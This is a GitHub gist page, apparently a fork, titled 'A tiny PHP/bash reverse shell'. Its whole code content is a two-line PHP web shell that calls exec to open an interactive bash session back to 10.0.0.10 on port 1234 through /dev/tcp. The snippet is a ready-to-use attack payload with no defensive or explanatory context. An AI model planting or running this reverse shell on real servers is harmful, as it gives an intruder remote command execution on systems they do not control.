Skip to content

Instantly share code, notes, and snippets.

@mano8
Forked from rshipp/shell.php
Created April 13, 2024 16:41
Show Gist options
  • Save mano8/52e6f32406f8f494b27726105d9a51d4 to your computer and use it in GitHub Desktop.
Save mano8/52e6f32406f8f494b27726105d9a51d4 to your computer and use it in GitHub Desktop.
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment